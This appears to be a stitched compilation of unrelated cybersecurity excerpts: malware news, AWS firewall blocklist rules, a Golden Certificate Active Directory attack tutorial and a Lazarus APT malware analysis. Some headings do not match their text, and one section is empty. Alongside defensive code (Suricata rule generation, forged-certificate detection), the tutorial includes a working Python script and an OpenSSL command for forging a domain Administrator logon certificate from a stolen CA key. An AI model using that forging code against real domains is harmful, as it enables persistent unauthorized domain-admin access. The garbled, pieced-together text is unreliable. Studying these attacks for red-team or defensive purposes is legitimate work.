From Drone to Counter-Drone: The Shifting Role of Cybersecurity

Cybersecurity has always been an issue in the drone industry, but its reach is expanding and evolving in multiple dimensions. Traditionally, cybersecurity concerns in the drone world referred either to the vulnerability of drone data and operations to cyberattacks, or to the role drones themselves played in carrying out cyberattacks.

Android Malware BRATA Wipes Your Device After Stealing Data

The Android malware known as BRATA has added new and dangerous features to its latest version, including GPS tracking, the capacity to use multiple communication channels, and a function that performs a factory reset on the device to wipe all traces of malicious activity. BleepingComputer reports: BRATA was first spotted by Kaspersky back in 2019 as an Android RAT (remote access tool) that mainly targeted Brazilian users. In December 2021, a report by Cleafy underscored the emergence of the malware in Europe, where it was seen targeting e-banking users and stealing their credentials with the involvement of fraudsters posing as bank customer support agents. Analysts at Cleafy continued to monitor BRATA for new features, and in a new report published today, illustrate how the malware continues to evolve.

The latest versions of the BRATA malware now target e-banking users in the UK, Poland, Italy, Spain, China, and Latin America. Each variant focuses on different banks with dedicated overlay sets, languages, and even different apps to target specific audiences. The authors use similar obfuscation techniques in all versions, such as wrapping the APK file into an encrypted JAR or DEX package. This obfuscation successfully bypasses antivirus detections […]. On that front, BRATA now actively seeks signs of AV presence on the device and attempts to delete the detected security tools before proceeding to the data exfiltration step.

Let’s make the teen Tesla hack a teachable moment

Assaf Harel leads the research and innovation activities at Karamba Security, where he oversees a broad IP portfolio of innovative products and services.

The buzz about 19-year-old Tesla hacker David Colombo is well deserved. A flaw in third-party software allowed him to remotely access 25 vehicles of the world's leading EV manufacturer across 13 countries. The hacker said he was able to remotely unlock the doors, open the windows, blast music and start each vehicle.

How to deploy AWS Network Firewall to help protect your network from malware

Protecting your network and computers from security events requires a multi-layered strategy, and network-level traffic filtering is one of those layers. Users need internet access for business reasons, but they can inadvertently download malware, which can compromise network and data security. This post describes how to use custom Suricata rules with AWS Network Firewall to add protections that prevent users from downloading malware. You can use your own internal blocklist, or a list from commercial or open-source threat-intelligence feeds.
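Feeds rarely arrive as ready-made rules. The following added example (not part of the AWS post) turns a domain blocklist into Suricata rules that a Network Firewall stateful rule group accepts: one drop rule on the TLS SNI and one on the HTTP Host header per domain, with the feed validated and de-duplicated first. The feed text is constructed for the example; the SID range and the $HOME_NET/$EXTERNAL_NET variables are assumptions you would adapt to your own rule group.

```python
import re

# Constructed blocklist, not a real threat-intel feed: comments, blanks, mixed case,
# stray whitespace, a malformed entry and a duplicate are all present on purpose.
SAMPLE_FEED = """\
# constructed blocklist for the example
malware-dl.example
  Cdn.Evil-Updates.example   # inline comment
not a domain!!
malware-dl.example
"""

_LABEL = r"(?!-)[a-z0-9-]{1,63}(?<!-)"
DOMAIN_RE = re.compile(r"^(?:" + _LABEL + r"\.)+" + _LABEL + r"$")


def parse_feed(text):
    """Lower-case, validate and de-duplicate the feed. Malformed lines are dropped rather
    than turned into rules that would never match (or, worse, match far too much)."""
    seen, domains = set(), []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip().lower()
        if not line or line in seen or not DOMAIN_RE.match(line):
            continue
        seen.add(line)
        domains.append(line)
    return domains


def suricata_rules(domains, base_sid=1000001):
    """One drop rule on the TLS SNI and one on the HTTP Host header per domain.
    'dotprefix' + 'endswith' make ".evil.example" match evil.example and any of its
    subdomains but not notevil.example, which a bare content match would also catch."""
    rules, sid = [], base_sid
    for d in domains:
        rules.append(
            f'drop tls $HOME_NET any -> $EXTERNAL_NET any (msg:"Blocklisted TLS SNI {d}"; '
            f'tls.sni; dotprefix; content:".{d}"; nocase; endswith; sid:{sid}; rev:1;)'
        )
        sid += 1
        # http.host is already normalised to lower case by Suricata, so no nocase here.
        rules.append(
            f'drop http $HOME_NET any -> $EXTERNAL_NET any (msg:"Blocklisted HTTP host {d}"; '
            f'http.host; dotprefix; content:".{d}"; endswith; sid:{sid}; rev:1;)'
        )
        sid += 1
    return rules


if __name__ == "__main__":
    # Paste the output into the Suricata-compatible rule string of a stateful rule group.
    print("\n".join(suricata_rules(parse_feed(SAMPLE_FEED))))
```

Two caveats when deploying: dotprefix needs Suricata 5 or later, and a rule group evaluated in the default action order runs pass rules before drop rules, so a broad pass rule elsewhere in the policy will shadow these drops unless you switch the policy to strict order.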

BattleBots: Behind The Scenes With Ghost Raptor

The ability to make decisions autonomously is not just what makes robots useful, it’s what makes robots robots. We value robots for their ability to sense what’s going on around them, make decisions based on that information, and then take useful actions without our input. In the past, robotic decision making followed highly structured rules—if you sense this, then do that. In structured environments like factories, this works well enough. But in chaotic, unfamiliar, or poorly defined settings, reliance on rules makes robots notoriously bad at dealing with anything that could not be precisely predicted and planned for in advance.

Five Data Privacy Tips for Consumers

As a consumer, you must assume that your personal information is not 100% safe online. Hackers cause data breaches every single day, exposing our email addresses, passwords, credit card numbers, social security numbers and other sensitive personal data in the process. Most people don’t think about how serious this is until they are affected personally through malicious activity, such as an attempted unauthorized purchase using their information. The disturbing fact is this type of crime is exploding, and according to one study there is a new victim of identity theft every 2 seconds in the United States alone. Experian reports that in 31% of data breaches, people later have their identity stolen. When you consider that in January 2021 alone, more than 870 million records were compromised, this is pretty alarming.

Messenger upgrades its end-to-end encrypted chat experience

Although default end-to-end encryption won’t fully arrive on Facebook Messenger until sometime in 2023, the company says today its feature offering end-to-end encrypted group chats and calls in Messenger is now fully rolled out. In addition, Messenger is adding another security feature with the launch of screenshot notifications in end-to-end encrypted chats, similar to rival Snapchat, that will alert you if someone snaps a photo from Messenger’s disappearing messages. Users will also now be able to add GIFs, stickers, and reactions to their encrypted chats, too.

Domain Persistence: Golden Certificate Attack

Introduction

Security analysts with some Active Directory and pentesting background will know the concept of tickets. Kerberos, the default authentication protocol in AD, is ticket based: the Key Distribution Center (KDC) issues a Ticket-Granting Ticket (TGT) to an authenticated user, and the TGT is then exchanged for a service ticket (ST) for a particular service, such as a SQL Server instance. Attacks such as Golden Ticket show how an attacker who obtains the NTLM hash of the "krbtgt" account can forge TGTs and keep domain-admin-level access. For a red teamer, such domain persistence matters because a compromised admin password can be changed at any time. Persistence can also be achieved through the certificate-based authentication that Active Directory Certificate Services (AD CS) adds to a domain. One such method is the Golden Certificate attack: with the private key of the CA certificate, an attacker forges a certificate for any principal, and the domain controllers accept it for Kerberos (PKINIT) logon because the CA is trusted throughout the forest. AD CS enables this authentication path as soon as an enterprise CA is installed. The technique was implemented by Benjamin Delpy in Mimikatz, and Will Schroeder and Lee Christensen covered it in their research paper "Certified Pre-Owned: Abusing Active Directory Certificate Services", which can be referred to here.

Table of Contents

  • ADCS and Certificate Basics
  • Installing ADCS in a local AD environment
  • Extracting CA certificate
  • Forging a new CA certificate
  • Obtaining domain admin’s TGT
  • Extracting admin NTLM hash
  • Performing PtH (Pass the Hash) attack

ADCS and Certificate Basics

AD CS is the Windows public key infrastructure (PKI) role. It issues and manages certificates for a forest, binding the identity of a principal (user, computer or service account) to a key pair whose private half that principal holds. A certificate is an X.509-formatted, digitally signed document used for encryption, message signing and/or authentication. It contains the following details:

  • Subject – The owner of the certificate.
  • Public Key – Associates the Subject with a private key stored separately.
  • NotBefore and NotAfter dates – Define the duration that the certificate is valid.
  • Serial Number – An identifier for the certificate assigned by the CA.
  • Issuer – Identifies who issued the certificate (commonly a CA).
  • SubjectAlternativeName – Defines one or more alternate names that the Subject may go by.
  • Basic Constraints – Identifies if the certificate is a CA or an end entity and if there are any constraints when using the certificate.
  • Extended Key Usages (EKUs) – Object identifiers (OIDs) that describe what the certificate may be used for, e.g. Client Authentication or Smart Card Logon. Also known as Enhanced Key Usage in Microsoft parlance.
  • Signature Algorithm – Specifies the algorithm used to sign the certificate.
  • Signature – The signature over the certificate's body, made with the issuer's (e.g., a CA's) private key.

Certificate Authorities (CAs) issue certificates. When AD CS is installed, the CA first generates its own public/private key pair and issues itself a self-signed root CA certificate. Domain members receive that root certificate as a trusted root, and an enterprise CA's certificate is also published to the forest's NTAuthCertificates store, which is what lets domain controllers accept certificates the CA signed for logon. Whoever holds the CA's private key can therefore sign certificates the whole forest trusts.

Certificate Enrollment – The process by which a client obtains a certificate from AD CS is called certificate enrollment, and it works as follows:

  • The client generates a public/private key pair.
  • The client places the public key in a Certificate Signing Request (CSR), along with details such as the certificate subject and the name of the certificate template it wants.
  • The client signs the CSR with its private key and sends it to the enterprise CA server.
  • The CA checks that the requester is allowed to enroll in the requested template and that the request fits the template's settings.
  • The CA generates the certificate, signs it with its own private key and records it in its database.
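Every certificate that goes through this enrollment path ends up in the CA database (certutil -view lists it). A certificate signed directly with a stolen CA key, as in the golden certificate attack this article builds up to, never does, and that gives defenders a check. The following is an added example, not from the original post: it reads a dump of the CA database and a set of Kerberos TGT-request events (Event ID 4768, which carries the issuer and serial of the certificate when the logon was certificate-based) and flags logons whose certificate names this CA as issuer but whose serial the CA never issued. The database excerpt and the events are constructed, and the event field names are a simplified stand-in for the XML a domain controller writes.

```python
import re

# Constructed excerpt of `certutil -view` output from the enterprise CA; serials are made up.
CA_DB_DUMP = """\
Row 1:
  Serial Number: "1a00000002f3c9b8e1d4a5b6c7000000000002"
  Requester Name: "IGNITE\\DC1$"
  Certificate Template: "DomainController"
Row 2:
  Serial Number: "1a00000003a1b2c3d4e5f60718293a4b5c000003"
  Requester Name: "IGNITE\\raj"
  Certificate Template: "User"
"""

# Constructed 4768 (Kerberos TGT requested) events. PKINIT logons carry a
# "Certificate Information" block; password logons leave those fields empty.
EVENTS = [
    {"EventID": 4768, "TargetUserName": "raj", "CertIssuerName": "ignite-DC1-CA",
     "CertSerialNumber": "1A00000003A1B2C3D4E5F60718293A4B5C000003"},
    {"EventID": 4768, "TargetUserName": "Administrator", "CertIssuerName": "ignite-DC1-CA",
     "CertSerialNumber": "2F5E9C1A7B3D4E6F8A9B0C1D2E3F4A5B"},
    {"EventID": 4768, "TargetUserName": "aarti", "CertIssuerName": "", "CertSerialNumber": ""},
    {"EventID": 4769, "TargetUserName": "raj", "CertIssuerName": "", "CertSerialNumber": ""},
]

SERIAL_RE = re.compile(r'^\s*Serial Number:\s*"?([0-9A-Fa-f ]+)"?', re.M)


def norm_serial(serial):
    """Serials appear with varying case, separators and leading zeros; compare a canonical form."""
    digits = re.sub(r"[^0-9a-f]", "", serial.lower()).lstrip("0")
    return digits or "0"


def issued_serials(certutil_text):
    """Set of serials the CA actually issued, i.e. those present in its database."""
    return {norm_serial(m.group(1)) for m in SERIAL_RE.finditer(certutil_text)}


def find_unissued(events, issued, our_ca="ignite-DC1-CA"):
    """PKINIT logons that name our CA as issuer but whose serial the CA never issued."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 4768 or not ev.get("CertSerialNumber"):
            continue  # not a TGT request, or not certificate-based
        if ev.get("CertIssuerName") != our_ca:
            continue  # another issuer: would need that CA's database instead
        if norm_serial(ev["CertSerialNumber"]) not in issued:
            hits.append((ev["TargetUserName"], ev["CertSerialNumber"]))
    return hits


if __name__ == "__main__":
    for user, serial in find_unissued(EVENTS, issued_serials(CA_DB_DUMP)):
        print(f"possible forged certificate: user={user} serial={serial}")
```

Serial comparison is cheap but not airtight, since a forger can copy a serial the CA really issued; where the DC logs the certificate thumbprint as well, compare that too. And once a forged certificate has been seen, revocation does not help (the CA never issued it), so the remediation is to re-key the CA.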

Types of extensions in certificates – The following file extensions appear throughout this article:

  • *.p12 – PKCS#12 is a binary container that bundles the certificate, any intermediate certificates and the private key into a single, usually password-encrypted, file. Exporting a certificate with its private key from the Certificates MMC snap-in produces a PKCS#12 file.
  • *.pfx – Same format as *.p12. PFX was Microsoft's original name for the container (it was folded into PKCS#12), while the .p12 extension comes from Netscape; tools differ in which extension they expect, which is why you will see us converting *.p12 to *.pfx.
  • *.pem – In this context, a Base64-encoded (text) certificate plus private key pair. In general a PEM file can hold any combination of keys, certificates and CSRs, depending on what the tool wrote.

Installing ADCS in a local AD environment

To configure AD CS in our test environment, we followed these steps.

Step 1: Open Server Manager and choose "Add roles and features".

Step 2: Read the prerequisites Windows recommends and click Next.

Step 3: Choose the server from the server pool. Your pool may contain several servers; we choose DC1.ignite.local.

Step 4: Under Server Roles, choose Active Directory Certificate Services and click Next.

Step 5: You can add extra features here; nothing extra is needed for this demo, so click Next.

Step 6: Choose the Certification Authority role service. The CA signs user certificates and is what makes certificate-based authentication possible.

Step 7: Click Install.

Step 8: From the notification flag, click "Configure Active Directory Certificate Services on the destination server".

Step 9: Specify the credentials used to configure the role services; an enterprise CA must be set up by a member of Enterprise Admins.

Step 10: Select the Certification Authority role service (the wizard asks again, so tick it and continue).

Step 11: Choose Enterprise CA.

Step 12: Choose Root CA. A root CA sits at the top of the PKI hierarchy and signs its own certificate, so nothing above it needs to trust it first.

Step 13: Create a new private key. As explained above, this key signs every certificate the CA issues, including its own root certificate, and it is exactly what the golden certificate attack needs, as shown later.

Step 14: Adjust the cryptographic options as you wish; we leave everything at the defaults.

Step 15: Set the common name for the CA certificate.

Extracting CA certificate

Forging a new CA certificate

The exported PKCS#12 file holds the CA certificate together with its private key. The first step is to convert it to PEM with OpenSSL, which prompts for the export password and then for a passphrase to protect the PEM private key (add -nodes to write the key unencrypted):

"C:\Program Files\OpenSSL-Win64\bin\openssl.exe" pkcs12 -in ignite-DC1-CA.p12 -out newfile.pem

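What the forging step actually produces is easier to see in code than in tool output. The following is an added example, not the original post's tooling (Mimikatz's crypto::scauth and ForgeCert do the same job): using the cryptography library, it signs a logon certificate for a chosen UPN directly with the CA key. It generates a throwaway CA in memory so it runs offline; in the attack you would instead load the exported ignite-DC1-CA.p12. The domain ignite.local and the Administrator account are the post's lab setup, and the PFX password is a hypothetical value. It also illustrates the enrollment description above from the other side: the forged certificate involves no CSR, no template check and no CA database entry.

```python
import datetime

from cryptography import x509
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import padding, rsa
from cryptography.hazmat.primitives.serialization import pkcs12
from cryptography.x509.oid import ExtendedKeyUsageOID, NameOID

# Microsoft OIDs: the UPN otherName in the SAN and the Smart Card Logon EKU.
UPN_OID = x509.ObjectIdentifier("1.3.6.1.4.1.311.20.2.3")
SMARTCARD_LOGON_OID = x509.ObjectIdentifier("1.3.6.1.4.1.311.20.2.2")


def _now():
    return datetime.datetime.now(datetime.timezone.utc)


def make_ca(common_name="ignite-DC1-CA"):
    """Stand-in for the exported CA so the script runs offline: a self-signed root, which is
    what AD CS creates on install. In the attack you would instead call
    pkcs12.load_key_and_certificates() on the bytes of ignite-DC1-CA.p12."""
    key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    name = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, common_name)])
    cert = (
        x509.CertificateBuilder()
        .subject_name(name)
        .issuer_name(name)
        .public_key(key.public_key())
        .serial_number(x509.random_serial_number())
        .not_valid_before(_now() - datetime.timedelta(days=1))
        .not_valid_after(_now() + datetime.timedelta(days=3650))
        .add_extension(x509.BasicConstraints(ca=True, path_length=None), critical=True)
        .sign(key, hashes.SHA256())
    )
    return key, cert


def der_utf8string(text):
    """DER-encode a UTF8String (tag 0x0C, short-form length); the UPN otherName value is one."""
    raw = text.encode("utf-8")
    if len(raw) > 127:
        raise ValueError("long-form DER length not handled in this example")
    return b"\x0c" + bytes([len(raw)]) + raw


def forge_auth_cert(ca_key, ca_cert, upn, sam_account, lifetime_days=365):
    """Sign a logon certificate for `upn` directly with the CA key. No CSR is submitted,
    no template is checked and the CA database never sees it: the golden certificate."""
    user_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    cert = (
        x509.CertificateBuilder()
        .subject_name(x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, sam_account)]))
        .issuer_name(ca_cert.subject)
        .public_key(user_key.public_key())
        .serial_number(x509.random_serial_number())
        .not_valid_before(_now() - datetime.timedelta(minutes=5))
        .not_valid_after(_now() + datetime.timedelta(days=lifetime_days))
        # The DC maps the certificate to an account through the UPN in the SAN.
        .add_extension(x509.SubjectAlternativeName([x509.OtherName(UPN_OID, der_utf8string(upn))]),
                       critical=False)
        # Client Authentication (plus Smart Card Logon) is what PKINIT requires.
        .add_extension(x509.ExtendedKeyUsage([ExtendedKeyUsageOID.CLIENT_AUTH, SMARTCARD_LOGON_OID]),
                       critical=False)
        .sign(ca_key, hashes.SHA256())
    )
    return user_key, cert


def signed_by(cert, ca_cert):
    """The chain check a DC performs (alongside NTAuth membership): does the CA key verify it?"""
    try:
        ca_cert.public_key().verify(cert.signature, cert.tbs_certificate_bytes,
                                    padding.PKCS1v15(), cert.signature_hash_algorithm)
        return True
    except InvalidSignature:
        return False


def upn_of(cert):
    """Read the UPN back out of the SAN, as the KDC would."""
    san = cert.extensions.get_extension_for_class(x509.SubjectAlternativeName).value
    for other in san.get_values_for_type(x509.OtherName):
        if other.type_id == UPN_OID:
            return other.value[2:].decode("utf-8")  # skip the DER tag and length bytes
    return None


def to_pfx(key, cert, password=b"P@ssw0rd"):  # hypothetical password for the example
    """Package key + certificate as PKCS#12, the form Rubeus (asktgt /certificate:) accepts."""
    return pkcs12.serialize_key_and_certificates(b"forged", key, cert, None,
                                                 serialization.BestAvailableEncryption(password))


def from_pfx(data, password=b"P@ssw0rd"):
    key, cert, _chain = pkcs12.load_key_and_certificates(data, password)
    return key, cert


if __name__ == "__main__":
    ca_key, ca_cert = make_ca()
    user_key, forged = forge_auth_cert(ca_key, ca_cert, "administrator@ignite.local", "Administrator")
    print("forged for", upn_of(forged), "| verifies under CA key:", signed_by(forged, ca_cert))
    with open("forged.pfx", "wb") as fh:
        fh.write(to_pfx(user_key, forged))
```

The point to take from signed_by() is that the domain controller never consults the CA: the signature verifies, the issuer is in NTAuth, the UPN maps to an account, and the logon succeeds, which is why the only real fix after a CA key compromise is re-keying the CA.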
North Korea’s Lazarus APT leverages Windows Update client, GitHub in latest campaign

This blog was authored by Ankur Saini and Hossein Jazi

Lazarus Group is one of the most sophisticated North Korean APTs that has been active since 2009. The group is responsible for many high profile attacks in the past and has gained worldwide attention. The Malwarebytes Threat Intelligence team is actively monitoring its activities and was able to spot a new campaign on Jan 18th 2022.

In this campaign, Lazarus conducted spear phishing attacks weaponized with malicious documents that use their known job opportunities theme. We identified two decoy documents masquerading as American global security and aerospace giant Lockheed Martin.

In this blog post, we provide technical analysis of this latest attack including a clever use of Windows Update to execute the malicious payload and GitHub as a command and control server. We have reported the rogue GitHub account for harmful content.

Analysis

The two macro-embedded documents lure targets with new job opportunities at Lockheed Martin:

  • Lockheed_Martin_JobOpportunities.docx
  • Salary_Lockheed_Martin_job_opportunities_confidential.doc

The compilation time for both of these documents is 2020-04-24, but we have enough indicators to confirm that they were used in a campaign around late December 2021 and early 2022. Among the indicators that show this attack operated recently are the domains used by the threat actor.

Both of the documents use the same attack theme and have some common things like embedded macros but the full attack chain seems to be totally different. The analysis provided in the blog is mainly based on the “Lockheed_Martin_JobOpportunities.docx” document but we also provide brief analysis for the second document (Salary_Lockheed_Martin_job_opportunities_confidential.doc) at the end of this blog.

Attack Process

The image below shows the full attack process, which we discuss in detail in this article. The attack starts by executing the malicious macros embedded in the Word document. The malware then performs a series of injections and establishes startup persistence on the target system. In the next section we provide technical details about the various stages of this attack and the capabilities of its payload.

Macros: Control flow hijacking through KernelCallbackTable

The macro code uses a very unusual and little-known technique to hijack the control flow and execute malicious code. The malware retrieves the address of the "WMIsAvailableOffline" function from "wmvcore.dll", changes the memory protection of the code in "WMIsAvailableOffline" to make it writable, and overwrites that code in memory with the Base64-decoded shellcode.

Another interesting thing in this code is the control-flow hijack through the KernelCallbackTable member of the PEB. The malware calls NtQueryInformationProcess with the ProcessBasicInformation class, which returns the address of the PEB, and reads the KernelCallbackTable pointer from it.

KernelCallbackTable is initialised to an array of callback functions when user32.dll is loaded; the kernel-side window manager (win32k) uses it to call back into user mode, for example while a window message is being dispatched. To hijack the control flow, the malware replaces the USER32!_fnDWORD callback in the table with the address of the overwritten WMIsAvailableOffline function, so the next such callback lands in the shellcode. Once the flow has been hijacked and the malicious code has run, the rest of the code restores the KernelCallbackTable to its original state.

Shellcode Analysis

The shellcode loaded by the macro contains an encrypted DLL, which it decrypts at runtime and manually maps into memory. After mapping the DLL, the shellcode jumps to its entry point. The shellcode resolves the APIs it needs with a custom hashing method. We used Hollows Hunter to dump the DLL and reconstruct its IAT once it was fully mapped into memory.

The resolver takes two parameters: the hash of the DLL name and the hash of the function to look up in that DLL. The hash itself is a very simple algorithm, reproduced here in Python:

def string_hashing(name):
    # Weak rolling hash: for every character, OR in 0x60 (which folds ASCII
    # letters to lower case) and double the running value.
    hash = 0
    for i in range(0, len(name)):
        hash = 2 * (hash + (ord(name[i]) | 0x60))
    return hash
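In practice an analyst runs that hash over every export name of the DLLs the shellcode is likely to touch and looks the shellcode's constants up in the result. The following added example (not from the Malwarebytes post) does that: it builds a (DLL hash, API hash) table, keeps any collisions visible, and labels a list of hash pairs. The candidate names are a small constructed subset (a real run would read the export tables of the DLLs on disk), and the optional 32-bit wrap is an assumption about the shellcode's register width that the post does not state.

```python
# Constructed candidate list; a real resolver would walk the export tables of the DLLs
# on disk (pefile is the usual tool) instead of a hand-picked subset.
CANDIDATES = {
    "kernel32.dll": ["LoadLibraryA", "GetProcAddress", "VirtualAlloc", "VirtualProtect",
                     "CreateThread", "ExitProcess"],
    "ntdll.dll": ["NtQueryInformationProcess", "NtProtectVirtualMemory", "RtlMoveMemory"],
    "wmvcore.dll": ["WMIsAvailableOffline"],
}


def api_hash(name, bits=None):
    """The shellcode's string hash as reconstructed above. OR-ing each byte with 0x60
    folds ASCII case ('A' | 0x60 == 'a'), so KERNEL32.DLL and kernel32.dll hash alike.
    The post's Python never wraps; bits=32 emulates a 32-bit accumulator, which is an
    assumption about the shellcode, not something the post states."""
    h = 0
    for ch in name:
        h = 2 * (h + (ord(ch) | 0x60))
        if bits:
            h &= (1 << bits) - 1
    return h


def build_table(candidates, bits=None):
    """Map (dll_hash, api_hash) -> (dll, api). Names of equal length can collide under a
    hash this weak, so collisions are reported instead of silently overwritten."""
    table, collisions = {}, []
    for dll, apis in candidates.items():
        dll_h = api_hash(dll, bits)
        for api in apis:
            key = (dll_h, api_hash(api, bits))
            if key in table and table[key] != (dll, api):
                collisions.append((table[key], (dll, api)))
            table.setdefault(key, (dll, api))
    return table, collisions


def resolve(dll_hash, func_hash, table):
    """Return (dll, api) or None, mirroring what the shellcode's resolver finds in exports."""
    return table.get((dll_hash, func_hash))


def annotate_imports(pairs, table):
    """Label the (dll_hash, func_hash) pairs lifted from the shellcode's import stub."""
    return [(dh, fh, resolve(dh, fh, table)) for dh, fh in pairs]


if __name__ == "__main__":
    table, collisions = build_table(CANDIDATES)
    # Constructed pairs standing in for constants read out of the dumped shellcode.
    wanted = [(api_hash("kernel32.dll"), api_hash("VirtualProtect")),
              (api_hash("ntdll.dll"), api_hash("NtQueryInformationProcess")),
              (0xDEADBEEF, 0x1337)]
    for dh, fh, hit in annotate_imports(wanted, table):
        print(f"{dh:#x} {fh:#x} -> {hit or 'unresolved'}")
    if collisions:
        print("collisions:", collisions)
```

Because the hash doubles on every character, names of different lengths can never collide, but same-length names can, which is why the table keeps the first hit and reports the rest rather than guessing.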